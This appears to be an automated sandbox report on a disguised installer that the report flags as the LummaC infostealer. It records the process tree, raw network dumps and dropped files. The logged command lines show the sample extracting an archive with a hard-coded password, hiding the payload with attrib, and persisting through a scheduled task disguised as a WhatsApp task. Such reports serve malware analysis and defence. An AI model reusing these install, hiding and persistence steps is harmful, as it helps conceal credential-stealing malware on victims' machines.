1177<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2025-03-08 02:15:42 UTC	1369	IN	Data Raw: 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 Data Ascii: d><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf
2025-03-08 02:15:42 UTC	1369	IN	Data Raw: 30 2e 31 2e 31 2d 2f 61 70 69 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 Data Ascii: 0.1.1-/api"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p>
2025-03-08 02:15:42 UTC	572	IN	Data Raw: 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 64 28 29 7b 76 61 72 20 62 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d Data Ascii: t>(function(){function d(){var b=a.getElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-
2025-03-08 02:15:42 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	21:14:17
Start date:	07/03/2025
Path:	C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe"
Imagebase:	0x400000
File size:	3'548'416 bytes
MD5 hash:	4F4E6DD4D4B9D96E69B7F8F97E867023
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	21:14:18
Start date:	07/03/2025
Path:	C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp" /SL5="$1042C,1192681,727040,C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe"
Imagebase:	0x400000
File size:	2'541'056 bytes
MD5 hash:	6C66FDD38C098F271FDE6E9E74DBD0EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	21:14:23
Start date:	07/03/2025
Path:	C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe" /verysilent /sp-
Imagebase:	0x400000
File size:	3'548'416 bytes
MD5 hash:	4F4E6DD4D4B9D96E69B7F8F97E867023
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	21:14:23
Start date:	07/03/2025
Path:	C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp" /SL5="$30420,1192681,727040,C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe" /verysilent /sp-
Imagebase:	0x400000
File size:	2'541'056 bytes
MD5 hash:	6C66FDD38C098F271FDE6E9E74DBD0EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	21:14:37
Start date:	07/03/2025
Path:	C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe" x "C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\logs" -o"C:\Users\user\AppData\Local\Programs\Common" -y -pCC3ba8B679c926fc9911aeDE9009E589CBD3667C48439c630418D27fDbb52Fc8
Imagebase:	0xff0000
File size:	847'360 bytes
MD5 hash:	6482EE0F372469D1190C74BD70D76153
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	21:14:37
Start date:	07/03/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff62fc20000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	21:14:38
Start date:	07/03/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd" /c attrib +h +S "C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe"
Imagebase:	0xc70000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	21:14:38
Start date:	07/03/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff62fc20000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	21:14:38
Start date:	07/03/2025
Path:	C:\Windows\SysWOW64\attrib.exe
Wow64 process (32bit):	true
Commandline:	attrib +h +S "C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe"
Imagebase:	0x1b0000
File size:	19'456 bytes
MD5 hash:	0E938DD280E83B1596EC6AA48729C2B0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	21:14:38
Start date:	07/03/2025
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"schtasks.exe" /create /xml C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\lang /tn WhatsAppSyncTaskMachineCore /f
Imagebase:	0xfe0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	21:14:38
Start date:	07/03/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff62fc20000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	21:14:40
Start date:	07/03/2025
Path:	C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\programs\common\taskshostw.exe C:\Windows\system32\config\systemprofile\AppData\Local\programs\common\taskshostw.exe
Imagebase:	0x400000
File size:	1'427'456 bytes
MD5 hash:	33645B3AFD79ED29F7E6F476D7F6ED4B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000011.00000002.1515993134.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000011.00000003.1470597131.0000000002990000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	21:14:41
Start date:	07/03/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp.cmd""
Imagebase:	0xc70000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	21:14:41
Start date:	07/03/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff62fc20000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	21:15:37
Start date:	07/03/2025
Path:	C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\programs\common\taskshostw.exe
Imagebase:	0x400000
File size:	1'427'456 bytes
MD5 hash:	33645B3AFD79ED29F7E6F476D7F6ED4B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Magic_V_pro_setup_stable_latest_release_version_9_709.exe

Overview

General Information

Detection

Compliance

Signatures

Classification

Process Tree

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Privilege Escalation

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Programs\Common\willrandom.exe

C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp

C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp

C:\Users\user\AppData\Local\Temp\is-QC304.tmp\_isetup\_setup64.tmp

C:\Users\user\AppData\Local\Temp\is-QC304.tmp\idp.dll

C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp.cmd

C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\_isetup\_setup64.tmp

C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.dll

C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe

Windows Analysis Report
Magic_V_pro_setup_stable_latest_release_version_9_709.exe